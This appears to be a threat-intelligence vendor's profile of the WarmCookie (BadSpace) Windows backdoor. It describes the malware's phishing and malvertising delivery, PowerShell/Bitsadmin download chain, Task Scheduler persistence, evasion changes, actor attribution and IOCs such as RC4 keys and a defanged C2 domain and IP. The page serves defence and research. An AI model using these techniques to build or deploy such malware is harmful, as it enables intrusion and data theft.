WarmCookie
WarmCookie, also known as BadSpace, is a Windows backdoor malware family first reported as emerging in April 2024. It has been distributed through malspam, malvertising, phishing emails, malicious downloads, and recruiting-, invoice-, and job-themed lures, often using obfuscated JavaScript delivered in ZIP archives that launches PowerShell and Bitsadmin to download and execute a WarmCookie DLL. It has also been observed delivered by other malware distribution ecosystems including CastleLoader/CASTLEBOT. WarmCookie is designed to provide long-term access to compromised environments, enable remote access, data theft, and deployment of additional payloads. Reported follow-on payloads include CSharp-Streamer-RAT and Cobalt Strike, and it has also been referenced as a secondary payload in broader loader ecosystems.
WarmCookie establishes persistence via Windows Task Scheduler. Reporting specifically notes use of the legacy Task Scheduler 1.0 COM interfaces for persistence, as well as scheduled tasks created under paths such as %ALLUSERSPROFILE% or %ALLDATA%, with re-execution after a 60-second delay. Newer variants changed the scheduled-task execution parameter from /p to /u and use randomized folder and task names derived from a "string bank" of legitimate company names to improve evasion. Recent variants also introduced dual GUID-like mutexes, campaign IDs embedded since July 2024, and additional execution handlers for EXE, DLL, and PowerShell payloads, including DLL execution via rundll32.exe with a Start export. Elastic reported that payloads are written to temporary directories before execution and that some builds support self-update and persistence removal commands.
Cisco Talos assessed with high confidence that recent WarmCookie/BadSpace post-compromise activity is related to TA866 (also known as Asylum Ambuscade), and Talos further assessed that WarmCookie likely shares authorship with the Resident backdoor based on code and functional similarities including RC4 decryption and mutex handling. Proofpoint also reported TA584 using WarmCookie in 2024, and Recorded Future linked WarmCookie infrastructure and delivery to TAG-150/GrayBravo-associated CastleLoader activity. Victimology associated with TA866-linked follow-on activity was concentrated in the United States, with manufacturing the most affected sector, followed by government and financial services.
Infrastructure and clustering details reported for WarmCookie include campaign IDs such as traffic1, traffic2, lod2lod, capo, and PrivateDLL; RC4 keys including 83ddc084e21a244c, fd1285af2130, and ac180d12b62a; and a likely reused default SSL certificate across C2 infrastructure with SHA1 fingerprint e88727d4f95f0a366c2b3b4a742950a14eff04a4 and SHA256 fingerprint 8c5522c6f2ca22af8db14d404dbf5647a1eba13f2b0f73b0a06d8e304bd89cc0. Reported C2-related indicators include the domain storsvc-win[.]com and the IP 192[.]36[.]57[.]164. WarmCookie was also named among malware families targeted by Europol's Operation Endgame actions in May 2025, but subsequent reporting indicates the malware remained active and continued to evolve.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
We assess with high confidence that recent post-compromise intrusion activity associated with WarmCookie/BadSpace is related to previous post-compromise activity that we attribute to TA866.
These malware families are frequently observed as initial infection vectors that deliver a wide range of secondary payloads, including SectopRAT, WarmCookie, HijackLoader, NetSupport RAT...
"...a new backdoor “BadSpace”..."; "...the malware’s alias name WarmCookie."
Proofpoint says TA584 has used a large number of payloads over the years, including Ursnif, LDR4, WarmCookie, Xeno RAT, Cobalt Strike, and DCRAT.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
Initial Access
Qakbot was frequently distributed through phishing emails, including hijacked email threads... WarmCookie, also known as BadSpace, is a malware family... being distributed through malspam and malvertising.
Execution
10 techniques
Execution
Gh0stRAT/SimpleRemoter code creating a scheduled task through Task Scheduler COM interfaces... WarmCookie initializes COM, creates the older Task Scheduler 1.0 object using CLSID_CTaskScheduler, and requests IID_ITaskScheduler. It then creates a work item, configures flags and creates a trigger.
WarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay.
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command
We identified four new handlers ... providing quick capabilities to launch executables, DLLs, and scripts: ... PowerShell script execution ... Then, it executes the temporary file directly or uses either rundll32.exe or PowerShell.exe.
Malware and MITRE ATT&CK ... Techniques ... Command and Scripting Interpreter: Windows Command Shell.
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command
The obfuscated JavaScript downloader, often delivered as a compressed ZIP, triggers a PowerShell command that uses Bitsadmin to download and execute the WarmCookie DLL
Warm Cookie - is a backdoor distributed via phishing emails and malicious downloads. It uses deceptive lures, such as job-related attachments, to trick users into executing malicious payloads.
Persistence
4 techniques
Persistence
Gh0stRAT/SimpleRemoter code creating a scheduled task through Task Scheduler COM interfaces... WarmCookie initializes COM, creates the older Task Scheduler 1.0 object using CLSID_CTaskScheduler, and requests IID_ITaskScheduler. It then creates a work item, configures flags and creates a trigger.
WarmCookie leverages Task Scheduler to achieve persistence, creating scheduled tasks under %ALLUSERSPROFILE% or %ALLDATA%, and re-executing itself after a 60-second delay.
Privilege Escalation
3 techniques
Privilege Escalation
Gh0stRAT/SimpleRemoter code creating a scheduled task through Task Scheduler COM interfaces... WarmCookie initializes COM, creates the older Task Scheduler 1.0 object using CLSID_CTaskScheduler, and requests IID_ITaskScheduler. It then creates a work item, configures flags and creates a trigger.
Stealth
6 techniques
Stealth
"campaign markers embedded as RC4 keys" and code references to decrypted strings (e.g., "StringDecrypt" / "StringDecrypt2")
It uses deceptive lures, such as job-related attachments, to trick users into executing malicious payloads.
"New variants now embed two separate GUID-like mutexes, which are used for better control over initialization and synchronization"
This is done for defense evasion purposes, allowing the malware to relocate to more legitimate-looking directories.
Discovery
1 technique
Discovery
Collection
2 techniques
Collection
Command and Control
4 techniques
Command and Control
The infrastructure linked to TAG-150 includes both victim-facing Tier 1 components, such as IP addresses and domains used as command-and-control (C2) servers for multiple malware families...
Captured screenshots are transmitted to the attacker’s C2 server ... via HTTP POST requests.
IOCs tracked for this family
64 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
26 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware family distributed through malspam and malvertising. In the COM-focused example, it initializes COM and uses the legacy Task Scheduler 1.0 COM object via CLSID_CTaskScheduler and IID_ITaskScheduler to create a work item, configure flags, create a trigger, and establish persistence.
Named as a remote access trojan distributed by CastleLoader.
Previously distributed payload in TA584 activity; specific functionality not described in the provided content.
Previously used malware family in TA584 activity (mentioned historically).
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.